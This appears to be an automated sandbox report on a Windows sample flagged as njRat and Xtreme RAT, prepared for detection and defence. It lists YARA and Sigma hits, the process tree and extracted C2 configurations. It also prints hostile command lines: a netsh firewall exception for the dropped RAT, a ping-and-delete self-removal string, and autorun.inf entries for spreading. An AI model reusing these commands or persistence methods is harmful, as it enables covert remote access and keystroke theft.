
Windows Analysis Report 7FW4ce2RDy

Overview

General Information

Sample Name: 7FW4ce2RDy (renamed file extension from none to exe)
Analysis ID: 494416
MD5: 776211eed31b6a8ea3539ac1d822362c
SHA1: b18225f3217536c802d43d9e4a0ac8ac22a90109
SHA256: f32fb1af5db650065e6e1d02ade5506e6c0903e4bbc9ff6ff2fbf94bef6ffba4
Tags: exe, Xtrat

Detection

njRat, Xtreme RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Xtreme RAT
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Found malware configuration
Multi AV Scanner detection for submitted file
Detected njRat
Malicious sample detected (through community Yara rule)
Yara detected Njrat
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Uses netsh to modify the Windows network and firewall settings
Drops PE files to the startup folder
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Installs Xtreme RAT
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Contains functionality to inject threads in other processes
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Sigma detected: Netsh Port or Application Allowed
Contains functionality to retrieve information about pressed keystrokes
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to upload files via FTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Potential key logger detected (key state polling based)

Process Tree

  • System is w10x64
  • 7FW4ce2RDy.exe (PID: 6908 cmdline: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' MD5: 776211EED31B6A8EA3539AC1D822362C)
    • svchost.exe (PID: 3652 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • WerFault.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 2992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 512 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • chrome.exe (PID: 5608 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe MD5: C139654B5C1438A95B321BB01AD63EF6)
    • 562Server.exe (PID: 4472 cmdline: 'C:\Windows\system32\562Server.exe' MD5: B207157C9F171556BF4D240C14AABA0E)
      • System.exe (PID: 5712 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' MD5: B207157C9F171556BF4D240C14AABA0E)
        • netsh.exe (PID: 6764 cmdline: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • conhost.exe (PID: 3156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • System.exe (PID: 6552 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' .. MD5: B207157C9F171556BF4D240C14AABA0E)
  • System.exe (PID: 3156 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' .. MD5: B207157C9F171556BF4D240C14AABA0E)
  • System.exe (PID: 6872 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' .. MD5: B207157C9F171556BF4D240C14AABA0E)
  • cleanup

Malware Configuration

Threatname: Njrat

{"Campaign ID": "HacKed", "Version": "0.6.4", "Install Name": "System.exe", "Install Dir": "TEMP", "Registry Value": "301b5fcf8ce2fab8868e80b6c1f912fe", "Host": "windownssystem.ddns.net", "Port": "1010", "Network Seprator": "|'|'|"}

Threatname: Xtreme RAT

{"id": "MuAwaY", "group": "MuAwaY", "version": "T2.9", "mutex": "HgDdsuTd", "installdir": "MuAwaYOriginal", "installdirfile": "MuAwaY.exe", "ftp server": "ftp.ftpserver.com"}

Yara Overview

Initial Sample

Source: 7FW4ce2RDy.exe; Rule: RAT_Xtreme; Description: Detects Xtreme RAT; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x45d8:$a: XTREME
  • 0x9db8:$a: XTREME
  • 0xab70:$a: XTREME
  • 0x46b20:$a: XTREME
  • 0x46b2e:$a: XTREME
  • 0x54320:$a: XTREME
  • 0x5432e:$a: XTREME
  • 0xbd74:$b: ServerStarted
  • 0x89f0:$c: XtremeKeylogger
  • 0x470c:$d: x.html
  • 0x854a:$e: Xtreme RAT
Source: 7FW4ce2RDy.exe; Rule: Xtreme_Sep17_1; Description: Detects XTREME sample analyzed in September 2017; Author: Florian Roth
  • 0x5dcd:$x1: ServerKeyloggerU
  • 0x490b9:$x2: TServerKeylogger
  • 0x89f0:$x3: XtremeKeylogger
  • 0xab70:$x4: XTREMEBINDER
  • 0x46b2e:$x4: XTREMEBINDER
  • 0x5432e:$x4: XTREMEBINDER
  • 0xa850:$s1: shellexecute=
  • 0x6d4c:$s2: [Execute]
  • 0xa796:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: 7FW4ce2RDy.exe; Rule: JoeSecurity_XtremeRat; Description: Yara detected Xtreme RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 7FW4ce2RDy.exe; Rule: xtremrat; Description: Xtrem RAT v3.5; Author: Jean-Philippe Teissier / @Jipe_
  • 0x45d8:$a: XTREME
  • 0x9db8:$a: XTREME
  • 0xab70:$a: XTREME
  • 0x46b20:$a: XTREME
  • 0x46b2e:$a: XTREME
  • 0x54320:$a: XTREME
  • 0x5432e:$a: XTREME
  • 0xab70:$b: XTREMEBINDER
  • 0x46b2e:$b: XTREMEBINDER
  • 0x5432e:$b: XTREMEBINDER
  • 0x9dcc:$c: STARTSERVERBUFFER
  • 0xcbb4:$d: SOFTWARE\XtremeRAT
  • 0x89f0:$f: XtremeKeylogger
  • 0x854a:$h: Xtreme RAT

Dropped Files

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe; Rule: RAT_njRat; Description: Detects njRAT; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C
  • 0x61dc:$s2: netsh firewall add allowedprogram
  • 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run
  • 0x6124:$s4: yyyy-MM-dd
  • 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
Source: C:\Windows\SysWOW64\562Server.exe; Rule: RAT_njRat; Description: Detects njRAT; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C
  • 0x61dc:$s2: netsh firewall add allowedprogram
  • 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run
  • 0x6124:$s4: yyyy-MM-dd
  • 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe; Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security
Source: C:\Windows\SysWOW64\562Server.exe; Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security
Source: C:\Windows\SysWOW64\562Server.exe; Rule: njrat1; Description: Identify njRat; Author: Brian Wallace @botnet_hunter
  • 0x61dc:$a1: netsh firewall add allowedprogram
  • 0x61ac:$a2: SEE_MASK_NOZONECHECKS
  • 0x6598:$b1: [TAP]
  • 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del
  • 0x64ec:$c3: cmd.exe /c ping

Memory Dumps

Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp; Rule: RAT_njRat; Description: Detects njRAT; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C
  • 0x5fdc:$s2: netsh firewall add allowedprogram
  • 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run
  • 0x5f24:$s4: yyyy-MM-dd
  • 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp; Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security
Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp; Rule: njrat1; Description: Identify njRat; Author: Brian Wallace @botnet_hunter
  • 0x5fdc:$a1: netsh firewall add allowedprogram
  • 0x5fac:$a2: SEE_MASK_NOZONECHECKS
  • 0x6398:$b1: [TAP]
  • 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del
  • 0x62ec:$c3: cmd.exe /c ping
Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp; Rule: RAT_njRat; Description: Detects njRAT; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C
  • 0x5fdc:$s2: netsh firewall add allowedprogram
  • 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run
  • 0x5f24:$s4: yyyy-MM-dd
  • 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp; Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security

Unpacked PEs

Source: 8.2.System.exe.3e0000.0.unpack; Rule: RAT_njRat; Description: Detects njRAT; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C
  • 0x61dc:$s2: netsh firewall add allowedprogram
  • 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run
  • 0x6124:$s4: yyyy-MM-dd
  • 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
Source: 8.2.System.exe.3e0000.0.unpack; Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security
Source: 8.2.System.exe.3e0000.0.unpack; Rule: njrat1; Description: Identify njRat; Author: Brian Wallace @botnet_hunter
  • 0x61dc:$a1: netsh firewall add allowedprogram
  • 0x61ac:$a2: SEE_MASK_NOZONECHECKS
  • 0x6598:$b1: [TAP]
  • 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del
  • 0x64ec:$c3: cmd.exe /c ping
Source: 19.0.System.exe.3e0000.0.unpack; Rule: RAT_njRat; Description: Detects njRAT; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C
  • 0x61dc:$s2: netsh firewall add allowedprogram
  • 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run
  • 0x6124:$s4: yyyy-MM-dd
  • 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
Source: 19.0.System.exe.3e0000.0.unpack; Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' , ParentImage: C:\Users\user\Desktop\7FW4ce2RDy.exe, ParentProcessId: 6908, ProcessCommandLine: svchost.exe, ProcessId: 3652
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' , ParentImage: C:\Users\user\Desktop\7FW4ce2RDy.exe, ParentProcessId: 6908, ProcessCommandLine: svchost.exe, ProcessId: 3652
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE, CommandLine: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\System.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\System.exe, ParentProcessId: 5712, ProcessCommandLine: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE, ProcessId: 6764
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' , ParentImage: C:\Users\user\Desktop\7FW4ce2RDy.exe, ParentProcessId: 6908, ProcessCommandLine: svchost.exe, ProcessId: 3652

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\System.exe; Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe; Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\562Server.exe; Avira: detection malicious, Label: TR/ATRAPS.Gen
Found malware configuration
Source: 00000000.00000002.296286620.000000000076A000.00000004.00000020.sdmp; Malware Configuration Extractor: Xtreme RAT {"id": "MuAwaY", "group": "MuAwaY", "version": "T2.9", "mutex": "HgDdsuTd", "installdir": "MuAwaYOriginal", "installdirfile": "MuAwaY.exe", "ftp server": "ftp.ftpserver.com"}
Source: 4.2.562Server.exe.1d0000.0.unpack; Malware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.6.4", "Install Name": "System.exe", "Install Dir": "TEMP", "Registry Value": "301b5fcf8ce2fab8868e80b6c1f912fe", "Host": "windownssystem.ddns.net", "Port": "1010", "Network Seprator": "|'|'|"}
Multi AV Scanner detection for submitted file
Source: 7FW4ce2RDy.exe; Virustotal: Detection: 83%
Source: 7FW4ce2RDy.exe; ReversingLabs: Detection: 93%
Yara detected Njrat
Source: Yara match; File source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 7FW4ce2RDy.exe PID: 6908, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: 562Server.exe PID: 4472, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 5712, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 6552, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 3156, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
Source: Yara match; File source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED
Antivirus / Scanner detection for submitted sample
Source: 7FW4ce2RDy.exe; Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\System.exe; ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe; ReversingLabs: Detection: 95%
Source: C:\Windows\SysWOW64\562Server.exe; ReversingLabs: Detection: 95%
Machine Learning detection for sample
Source: 7FW4ce2RDy.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\System.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe; Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\562Server.exe; Joe Sandbox ML: detected
Source: 4.2.562Server.exe.1d0000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 1.2.svchost.exe.10000000.0.unpack; Avira: Label: TR/Agent.ssnsz
Source: 16.0.System.exe.d50000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack; Avira: Label: TR/Agent.ssnsz
Source: 20.2.System.exe.240000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 20.0.System.exe.240000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 8.0.System.exe.3e0000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 4.0.562Server.exe.1d0000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 16.2.System.exe.d50000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 8.2.System.exe.3e0000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 19.0.System.exe.3e0000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack; Avira: Label: TR/Agent.ssnsz
Source: 19.2.System.exe.3e0000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 1.0.svchost.exe.10000000.0.unpack; Avira: Label: TR/Agent.ssnsz
Source: 7FW4ce2RDy.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
Source: C:\Windows\SysWOW64\562Server.exe; File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: 7FW4ce2RDy.exe; Binary or memory string: autorun.inf
Source: 7FW4ce2RDy.exe; Binary or memory string: [autorun] ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: 7FW4ce2RDy.exe; Binary or memory string: [autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: 7FW4ce2RDy.exe, 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp; Binary or memory string: [autorun]
Source: svchost.exe; Binary or memory string: autorun.inf
Source: svchost.exe; Binary or memory string: [autorun] ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: svchost.exe; Binary or memory string: [autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: svchost.exe, 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp; Binary or memory string: [autorun]
Source: 7FW4ce2RDy.exe; Binary or memory string: [autorun]
Source: 7FW4ce2RDy.exe; Binary or memory string: autorun.inf
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe; Code function: 0_2_10005CA4 FindFirstFileW,FindClose,0_2_10005CA4

Networking:

Uses dynamic DNS services
Source: unknown; DNS query: name: windownssystem.ddns.net
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: windownssystem.ddns.net
Source: unknown; DNS traffic detected: query: windownssystem.ddns.net replaycode: Name error (3)
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe; Code function: 0_2_100068EC InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,0_2_100068EC
Source: unknown; DNS traffic detected: queries for: windownssystem.ddns.net
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe; Code function: 0_2_10005F86 URLDownloadToCacheFileW,CopyFileW,0_2_10005F86

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)
Source: 562Server.exe.0.dr, kl.cs; .Net Code: VKCodeToUnicode
Source: System.exe.4.dr, kl.cs; .Net Code: VKCodeToUnicode
Source: 4.2.562Server.exe.1d0000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 4.0.562Server.exe.1d0000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, kl.cs; .Net Code: VKCodeToUnicode
Source: 8.0.System.exe.3e0000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 8.2.System.exe.3e0000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 16.0.System.exe.d50000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 16.2.System.exe.d50000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 19.0.System.exe.3e0000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 19.2.System.exe.3e0000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 20.2.System.exe.240000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Source: 20.0.System.exe.240000.0.unpack, kl.cs; .Net Code: VKCodeToUnicode
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe; Code function: 0_2_10008568 SetWindowsHookExW 0000000D,10008040,00000000,00000000 0_2_10008568
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe; Code function: 0_2_10008040 GetKeyboardState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,VirtualAlloc,SendMessageA,CallNextHookEx,0_2_10008040
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe; Code function: 0_2_100069DC OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard,0_2_100069DC
Source: 7FW4ce2RDy.exe, 00000000.00000002.296286620.000000000076A000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe; Code function: 0_2_10006D04 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_10006D04

E-Banking Fraud:

Yara detected Njrat
Source: Yara match; File source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 7FW4ce2RDy.exe PID: 6908, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: 562Server.exe PID: 4472, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 5712, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 6552, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 3156, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
Source: Yara match; File source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED

Operating System Destruction:

Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\System.exe; Process information set: 01 00 00 00

                System Summary:

                barindex
                Yara detected Xtreme RAT
                Source: Yara match. File source: 7FW4ce2RDy.exe, type: SAMPLE
                Source: Yara match. File source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE
                Source: Yara match. File source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match. File source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
                Source: Yara match. File source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
                Source: Yara match. File source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE
